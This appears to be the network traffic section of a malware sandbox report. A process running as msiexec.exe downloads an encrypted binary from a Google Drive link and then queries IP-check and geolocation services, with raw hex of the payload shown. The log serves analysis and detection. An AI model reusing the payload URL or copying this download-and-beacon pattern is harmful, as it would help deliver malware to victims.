Feb 24, 2025 17:24:24.714117050 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Feb 24, 2025 17:24:25.317548990 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 24 Feb 2025 16:24:25 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 540c4d6c8252995ec503d47a9a52298c Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49820	158.101.44.242	80	7524	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 17:24:26.026154995 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Feb 24, 2025 17:24:26.623707056 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 24 Feb 2025 16:24:26 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: abb6ec8157e24db60131cd4fa37fc83b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49737	142.250.186.46	443	7524	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-02-24 16:24:10 UTC	216	OUT	GET /uc?export=download&id=1Nzmt_oJLJVDGk7AzLqTg32ZfePDF57a_ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 Host: drive.google.com Cache-Control: no-cache
2025-02-24 16:24:11 UTC	1610	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 24 Feb 2025 16:24:11 GMT Location: https://drive.usercontent.google.com/download?id=1Nzmt_oJLJVDGk7AzLqTg32ZfePDF57a_&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-BrWuLOLkJ8qw_jsZmWodTw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	142.250.181.225	443	7524	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-02-24 16:24:12 UTC	258	OUT	GET /download?id=1Nzmt_oJLJVDGk7AzLqTg32ZfePDF57a_&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2025-02-24 16:24:14 UTC	5021	IN	HTTP/1.1 200 OK X-GUploader-UploadID: AHMx-iE6W4ndMgd-ScbniznXqrcfeSYQbp_1oGgnOdMVUHmRo1r4gD3gffdNM_IxS5cwFweC3vbARGk Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="OWpmXgRvpIM247.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 276032 Last-Modified: Mon, 24 Feb 2025 09:20:11 GMT Date: Mon, 24 Feb 2025 16:24:14 GMT Expires: Mon, 24 Feb 2025 16:24:14 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=KtqWSg== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-02-24 16:24:14 UTC	5021	IN	Data Raw: 1d db 82 37 35 28 e8 fc 89 99 c7 2b ec 68 19 a3 50 5b 0f 78 03 af 8d 12 13 c0 3b 8b e8 fd 00 79 bb 87 0e e5 f1 95 24 d6 f7 28 b4 94 78 b0 94 a4 51 cc 32 c0 07 7c a2 0a ce 6b 9e 9d dc 68 58 95 8d 19 ec 84 b7 1c c9 3f 4c f8 63 7b 37 82 28 4e cd df c3 38 54 13 2a bc 77 a3 3b 8b 0c b3 fe f4 63 59 81 10 ca 1c d9 31 41 5f cf 3a 5f eb 01 c7 1c aa 19 26 77 ad 5f a2 57 d6 39 0e 9a 3e 77 bb bd 6e 48 8f eb 91 1d da 6a b4 8f 32 d6 e2 3f f5 c5 a3 df 56 9d d2 b3 63 0f 8b c0 ce 13 af 82 92 c6 80 ee 47 b8 96 ac 16 27 c6 03 4b ce 51 f3 2d 6f 48 5f af 63 53 c9 9c cf 02 9f 6b 1e ec 5e 42 22 68 0c 41 4c b7 41 20 70 5f a7 cb b5 7b 2f a1 87 07 db 74 f6 78 4f 81 d4 ea cf 1b 56 06 ec 8a 1a 85 5c db 0a 8e f0 9b 10 be c3 6a 28 02 28 5a 79 5d 77 98 ae c8 6d 00 4e a0 0d 7c ce 2c 0f Data Ascii: 75(+hP[x;y$(xQ2\|khX?Lc{7(N8T*w;cY1A_:_&w_W9>wnHj2?VcG'KQ-oH_cSk^B"hALA p_{/txOV\j((Zy]wmN\|,
2025-02-24 16:24:14 UTC	4657	IN	Data Raw: 95 89 55 75 24 13 2b 3c 53 16 97 53 6a 81 b4 f3 64 4d 52 05 79 9a bf e4 d0 38 98 8e a3 f3 47 07 ac ad 8b 9b e1 53 82 e9 61 c9 98 b2 b1 9e 05 00 d5 87 3f 55 c7 a3 71 f1 f1 43 1a 52 fc de 14 c3 36 d5 30 02 83 89 05 95 9b c7 7e d5 c5 cd cc fb 1c ef 73 b6 04 c5 15 03 77 01 d2 af e7 60 6a 05 57 ae 42 90 05 27 4c 24 bc ec 3a 8e c5 cf 89 7c 39 0b af 81 40 fc 18 ef e4 b5 17 01 a1 eb 5b 8f e2 6c e1 98 02 43 a5 63 73 dc 37 4f cb 9f 4f b2 92 68 19 49 db 90 1a 4c f0 31 74 5b 5f 8a 07 48 e5 f9 64 6a c5 ba 03 af 28 b5 f7 24 aa 7a 7a f7 1e 73 b8 f3 4a 61 43 08 cc dc 9d 74 b0 36 25 08 f0 ed a5 9f 18 c6 2a ea 4e 6d 35 93 d3 6f b3 5a 94 22 76 2b f5 51 84 72 bf 2f 91 24 87 2d 4e 8a d5 16 5e 12 63 8d ff 33 65 d5 0b 12 11 c2 52 d4 b5 f1 dd 49 dd bc 92 19 9f 29 09 94 a9 96 e3 Data Ascii: Uu$+<SSjdMRy8GSa?UqCR60~sw`jWB'L$:\|9@[lCcs7OOhIL1t[_Hdj($zzsJaCt6%*Nm5oZ"v+Qr/$-N^c3eRI)
2025-02-24 16:24:14 UTC	1323	IN	Data Raw: e6 71 d9 62 b9 41 2c 00 8c ab 22 63 3d 90 65 64 8f a8 5e 51 5c 96 83 8e 45 74 29 6f 33 76 e0 cd f3 5f a0 56 26 6c 8f 74 1d dc 62 43 c7 b8 61 b1 b9 23 29 c3 10 dd 8e 53 5e e1 62 b4 16 e9 f8 c1 3e 78 24 5e 10 5f 62 f8 2f 76 9a bb de ec 08 59 5c 30 da 02 06 34 91 e0 d1 fb f3 e4 f5 f6 bb f5 4f 16 ed d3 69 77 31 3e 8e f3 61 79 33 73 20 e8 e1 30 f5 af 55 bf f9 24 90 6f c1 8f 58 ec 4d aa 12 8c e7 96 b8 46 ed e2 a2 3a 6a b9 95 6f 10 e6 00 f0 70 03 e8 0e ae a8 46 20 66 a7 e6 b8 54 0c f0 4d e5 0c e4 aa de 41 90 1e 76 a5 b7 e2 ad 9e 98 bf 88 d3 c2 dd e3 a5 65 62 43 af 62 48 ad a7 6a 3c 5c 27 40 99 ce 64 eb 55 ab 57 c2 39 13 86 21 ad 88 a7 f4 5b 7d 0f 9f 7b 48 20 6f 7d 46 e6 e5 8f 7c 33 e6 7e 30 83 59 57 4a a5 ce f0 80 98 a1 65 23 5b ac 7f ea d3 66 6f 6c 2c 84 f9 31 Data Ascii: qbA,"c=ed^Q\Et)o3v_V&ltbCa#)S^b>x$^_b/vY\04Oiw1>ay3s 0U$oXMF:jopF fTMAvebCbHj<\'@dUW9![}{H o}F\|3~0YWJe#[fol,1
2025-02-24 16:24:14 UTC	1390	IN	Data Raw: 25 ee 6c 51 ad 05 6b d2 d8 a3 a8 bf ce 8f 71 e1 c4 33 10 64 53 62 af 21 18 94 a6 e5 7e 8d fa 93 fc 2b 5a a6 fa 52 6d c7 64 9d 14 63 43 cc e7 7a 02 7d 79 56 78 34 b2 e3 cf ce c0 9e e3 33 df 0c 93 a9 41 2c 25 77 89 fd 42 13 b0 cd e8 87 47 38 83 83 72 50 53 17 04 db d8 d6 e8 d0 0b d0 4e 18 ed 62 b8 6e 29 6d c8 8c 40 13 9f bf ac 4c 39 a8 5e 5b 80 87 9b fc 1f 09 7e 1d 91 23 ef 9b 48 5f a0 58 92 b7 94 15 bf c2 42 0a ab 9d 7a cf bb 79 29 c7 b8 e5 1f 60 ce ee 63 e1 a2 b3 cb ce 3e 02 e9 27 07 77 de f5 27 75 b6 f7 ac f1 96 56 5c 4a 78 27 17 25 68 e0 d1 f5 42 c5 fe 80 30 ec 46 e8 26 99 2c 09 1b 34 8e e6 c7 33 83 01 b0 ed e1 9e 59 87 33 bb d5 26 ee 37 ae 8e 52 ff 66 b1 43 13 f4 b3 91 57 fb 90 6c 3b 6f c9 1f 28 07 ce bc 2d 1a 0f 4a 2b b6 da 18 51 54 d7 44 99 3f 25 ca Data Ascii: %lQkq3dSb!~+ZRmdcCz}yVx43A,%wBG8rPSNbn)m@L9^[~#H_XBzy)`c>'w'uV\Jx'%hB0F&,43Y3&7RfCWl;o(-J+QTD?%
2025-02-24 16:24:14 UTC	1390	IN	Data Raw: d8 84 44 2d 23 a5 bb e3 75 41 4e bb 50 3e 41 b7 a3 a5 55 7f 74 aa 15 35 7b 54 6e 24 cd 09 40 c7 15 61 8a 1e 86 bf 9d 78 fc b3 eb 66 1c 1b 10 be 75 d1 6b ba b1 bb be 0b 8d fa 93 31 ca 40 d4 b4 40 7c b1 a9 70 63 63 49 b8 78 52 75 79 16 9a 6b 2a ca 93 cc c8 c2 8a ec 33 af 20 0d e0 41 26 5d 85 01 ef 32 4b c3 8e e8 8d 2e ee 9d 92 6c 78 07 11 1f 50 99 0b 9f d0 2e c6 19 82 ca 62 c8 c6 1f 65 e0 12 22 13 95 17 57 54 4b f6 51 5b 8e 11 be e5 65 43 29 1f 95 f1 dc a9 b9 91 b0 52 f4 eb bd 71 9f d3 68 5c ad 9d 7a c5 93 5d 02 c7 b2 fc e1 cc ce ee 68 d7 b3 d0 89 ae ef 72 4b 08 01 58 07 26 27 7f 1e d2 ca bf c8 59 58 49 13 02 0e 51 43 e8 af c0 e0 e0 e0 80 e5 e1 46 e8 92 94 b4 77 31 3e 98 1c 64 05 96 62 29 ce ed ff f3 b8 2b 71 d5 2c 8b 6b ae a5 53 ec 56 a2 d8 3d 3e b3 90 78 Data Ascii: D-#uANP>AUt5{Tn$@axfuk1@@\|pccIxRuyk*3 A&]2K.lxP.be"WTKQ[eC)Rqh\z]hrKX&'YXIQCFw1>db)+q,kSV=>x
2025-02-24 16:24:14 UTC	1390	IN	Data Raw: b3 e8 c2 89 f4 ae ff cd 68 11 1e 13 b5 13 20 20 8b 52 01 fc 6c ee 12 a0 9c f5 8d 53 1a 34 37 81 26 bb e3 6c 67 b4 ba 1f 3b 50 b2 85 e2 54 6e 74 b7 8c 8a 7d 69 6f 01 dd 08 cf d3 15 1b 00 5f 91 97 21 78 8f 7b 49 43 0e 7a 48 a0 73 df f3 9f a8 c1 f5 c8 8d fe 3b 7b 14 32 56 b1 40 1d 15 e3 ae 1d 7f 43 c6 41 3d 9b 7d 79 56 c9 0f dc e1 c5 da b0 90 5e 1b a8 08 bb ea 4a 04 98 05 11 e5 45 0c c4 8e e8 8d 4d 21 97 b9 66 7e 3c 0c 34 d4 d8 dd 98 d1 0b f0 6b 30 c8 62 c6 78 3a 72 cc cb cc 13 9f bf 00 16 38 a8 2e 4d d6 30 9b fc 11 6d d7 1c 9b 55 c0 07 cc 5f a0 2c b7 49 95 02 ed 84 60 33 15 8b 52 4c 93 23 23 d1 4c f9 99 26 f7 ca 63 c4 b4 d5 5f 97 3e 72 4a 2a 3d 5f 68 ff 55 5d 04 d2 c4 94 45 5a 5c 3a db 27 18 25 14 e0 d1 f5 c8 e4 e4 f2 b4 8c fd 98 84 b6 45 8f 25 34 fe ca 3e Data Ascii: h RlS47&lg;PTnt}io_!x{ICzHs;{2V@CA=}yV^JEM!f~<4k0bx:r8.M0mU_,I`3RL##L&c_>rJ*=_hU]EZ\:'%E%4>
2025-02-24 16:24:14 UTC	1390	IN	Data Raw: 19 65 fd 72 13 25 c8 52 c7 a1 80 09 42 b9 b6 8f 0f ed 3d 18 96 d9 a7 ce 29 5b 21 cb 72 fb 0f 84 bf e3 9f ba 3d 18 31 c4 04 52 06 9a 78 71 d5 2a ee 12 ab 8f ec 9c c2 f6 59 3c 0b 56 d4 35 7f 57 ba ba 6b 61 50 b2 90 f3 43 10 28 aa 01 c1 6e 70 7f 3c b9 02 32 c7 65 04 75 7a 86 b5 97 69 97 60 f2 e8 7f 62 79 77 73 af 5b ba a0 a7 a2 11 8d fa 93 4d 14 51 ce af 59 7b a6 df 3b 0a 0c 1d c6 45 58 75 6c 63 33 c7 2a c0 99 dd df a8 8f 26 33 df 02 a8 fb 50 37 40 7e 11 ef 48 70 82 9f f2 f4 ea 29 9d 98 75 64 07 0b 6b a0 d8 0b 95 c2 16 c1 77 5f 74 62 b8 6e 3a 63 d2 cb 8e 13 9f bf 72 5d 22 c7 85 5b fe b9 9b fc 23 b8 29 1f 91 53 f9 a5 e3 27 a0 52 8e 49 b5 06 93 d3 62 1b 1c 9d 7a c5 93 3f a4 86 b2 f8 93 04 d8 9c ff cf b4 b1 a7 83 3e 72 4d a0 35 48 16 b0 27 7f 10 70 91 9b ba e5 Data Ascii: er%RB=)[!r=1RxqY<V5WkaPC(np<2euzi`byws[MQY{;EXulc3&3P7@~Hp)udkw_tbn:cr]"[#)S'RIbz?>rM5H'p
2025-02-24 16:24:14 UTC	1390	IN	Data Raw: d3 6b 91 10 48 2b 54 f9 e1 45 9a 50 dd 23 91 29 df ae 49 e5 d5 1d 5e 1f 11 31 e9 19 15 ba b6 13 25 c8 52 d1 cb ea dd 42 bd c2 df 19 9f 2d 7a 28 a9 d9 e9 46 e4 25 b9 62 ea 27 ae ae f5 bd 72 b0 59 3b d7 12 05 3c f9 74 17 fd 0c 4c 37 b6 b4 42 8d da 8e 96 1e 13 54 e5 ec 7f 27 12 9f 5a 45 68 b2 9a e6 f6 5a 6e d8 3a c8 7d 19 cc 01 d0 04 03 c7 15 6f 00 5f 9a cd 8f 6e 8f 01 49 4e 61 08 16 a5 1c f3 51 ba bb b3 ca c0 03 93 f3 31 ce 40 d4 b4 40 6d b0 a9 74 63 63 49 cb 4c 5a 63 75 f7 35 04 74 c0 93 d7 ce b9 8f 50 33 df 02 bb 3e 4d 2c 26 29 16 e6 2d 62 98 8e e2 87 9d f7 8e b7 4e 4c 16 17 0e ce dc 0b b7 b3 0b d0 61 ed b6 64 b8 64 3a 72 c8 da 10 13 9f b1 00 1b 3b a8 2e 4d d6 30 9b fc 11 6d d7 1e 82 56 e8 b6 f2 89 a2 52 84 37 ba 06 9f d7 10 02 67 9d 0a d9 bb a0 29 c7 b8 Data Ascii: kH+TEP#)I^1%RB-z(F%b'rY;<tL7BT'ZEhZn:}o_nINaQ1@@mtccILZcu5tP3>M,&)-bNLadd:r;.M0mVR7g)
2025-02-24 16:24:14 UTC	1390	IN	Data Raw: bb c4 99 4b 64 1f a2 f8 ce da c3 b0 36 25 aa 09 2b d9 49 1f c2 76 40 7a 70 72 24 d3 6f b3 f8 6d 31 2c 1f e7 51 fe da 49 54 91 23 a1 88 61 92 d4 16 54 0b 7c 23 e9 0e 65 a5 75 0c 25 c2 56 fe fc a8 dd 48 cb 24 8e 19 ef 01 4a 96 a9 df f2 36 4a 30 91 2d ea 0f f2 ae 28 c2 6e 3d 18 1e ff 27 20 2a 81 6b 21 fd 54 8c 12 a1 96 2a 8d da 84 34 3b 75 12 bb e3 7b 25 e7 b8 43 4b 46 9a 19 e2 54 75 62 54 00 d8 5c 78 4f 1d 05 7a 23 c7 3d 31 a2 7a 8c a2 1a 39 8f 71 ea 43 00 7a 1a b9 73 df f3 9f a6 97 7b c8 8d f0 3b 7b 16 32 8a b1 40 1d 15 e3 ac 1d 5b 43 c6 41 f0 50 67 0b 67 68 2a b0 31 f8 d5 ce c0 fc 33 db aa 9e fc 33 34 39 05 61 4d 6a 14 98 8e e2 e8 1d 29 9d 98 75 5a 0d 9a 45 dd d8 0a ba c7 79 fa 7c 30 a9 c0 9d 73 12 c4 c8 a4 28 b1 ba ad 00 12 36 a8 2e f9 db aa e5 c4 1b 7b Data Ascii: Kd6%+Iv@zpr$om1,QIT#aT\|#eu%VH$J6J0-(n=' k!T4;u{%CKFTubT\xOz#=1z9qCzs{;{2@[CAPggh*13349aMj)uZEy\|0s(6.{
2025-02-24 16:24:14 UTC	1390	IN	Data Raw: 0a 46 80 c7 cc 5b 4e 86 59 c0 e4 ff 7b 43 9e ba 09 a5 9b 63 f3 4b cf 7a 6b f1 61 a1 a0 f3 2b 4c d9 00 dd d3 80 31 a2 36 5f 20 77 33 ab 95 66 0a 06 e2 55 69 72 e6 d3 6f bf 49 45 03 2b 5b f5 57 9d 76 70 2e e2 f3 ab 2a 43 f6 db 07 50 6b b3 51 f9 13 76 c5 1a 1f 4a 13 52 d6 bf b9 d2 30 01 aa 9c 69 e1 36 09 96 ad f1 aa 29 5b 2f cb 84 fa 0f 84 dd 27 b7 6f 37 77 e8 d7 13 2a 2a 9a 74 6e 2c 7c ee 18 b0 8c 86 41 cc 84 44 45 14 26 bb e7 57 1e b0 ba 49 49 bc a2 9a 92 27 ad 74 aa 0b a4 ae 69 6e 2e cb 04 1f c7 15 6f d1 b3 86 bf 9d 6b 9e 0f da 66 16 0c 64 f8 71 af 21 ac 99 3c cd c8 87 ec 67 5f 1d 52 c5 ac 6c 61 a6 d7 a2 0c a9 43 c6 4f 52 75 56 72 5c 7a 3b d6 fc 17 ce b0 ea fc 33 ce 19 c5 de 41 2c 2b 2d da ef 42 69 f7 42 e8 87 4b 29 8c 83 18 42 16 17 00 a3 e3 0b 9f d5 78 Data Ascii: F[NY{CcKzka+L16_ w3fUiroIE+[Wvp.CPkQvJR0i6)[/'o7w*tn,\|ADE&WII'tin.okfdq!<g_RlaCORuVr\z;3A,+-BiBK)Bx

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49751	104.21.32.1	443	7524	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-02-24 16:24:17 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-02-24 16:24:17 UTC	851	IN	HTTP/1.1 200 OK Date: Mon, 24 Feb 2025 16:24:17 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 49986 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Mon, 24 Feb 2025 02:31:11 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v8GXT%2FEBR3JB7xc5d8sFOnW8TE4fRQufjAmxDbC11jcoQQRVfbO6CKuOj25cZaB5CDVlXClLYKPLvssOHtpCY9yBLj3mmXZYLaJL0L%2BWGTgmchn3ptGyyV1VWakvfGnqQay0R3aT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9170ce13585c72b9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1788&min_rtt=1776&rtt_var=690&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1559829&cwnd=233&unsent_bytes=0&cid=aa818131b073ce84&ts=154&x=0"
2025-02-24 16:24:17 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49756	104.21.32.1	443	7524	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-02-24 16:24:17 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-02-24 16:24:18 UTC	853	IN	HTTP/1.1 200 OK Date: Mon, 24 Feb 2025 16:24:18 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 49987 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Mon, 24 Feb 2025 02:31:11 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jigqeOidh7160RUNsDIG%2BPJFBvk43g3Its8VnRWJIKn50QWLDZnFAPEY1t2wUTfYOgFKmVrWPUkbPNVUDIF1reCvg5589XV4%2BuTFF84LtUYhTqFOpgzvdjh7JbA7%2Fpe68NAhwdjq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9170ce186e0f41a6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1580&rtt_var=596&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1829573&cwnd=245&unsent_bytes=0&cid=3c5ab324404d2644&ts=207&x=0"
2025-02-24 16:24:18 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49765	104.21.32.1	443	7524	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-02-24 16:24:19 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-02-24 16:24:19 UTC	853	IN	HTTP/1.1 200 OK Date: Mon, 24 Feb 2025 16:24:19 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 49988 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Mon, 24 Feb 2025 02:31:11 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ljt0idZA84NT%2BR43TIQ%2BoruvSLQ0QRU8A%2Bk8hwab7ddq9UHFxI3RsGcliRyKUub2yNxi5aCJpER0xbvNR7OtMXXIAhue9dwFJ2IcJ5ZtvqZNeC6kWfVIsGmov43134nqtHuvaz2A"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9170ce21ef091875-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1689&min_rtt=1687&rtt_var=638&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1708601&cwnd=183&unsent_bytes=0&cid=023230cc11daa3f3&ts=163&x=0"
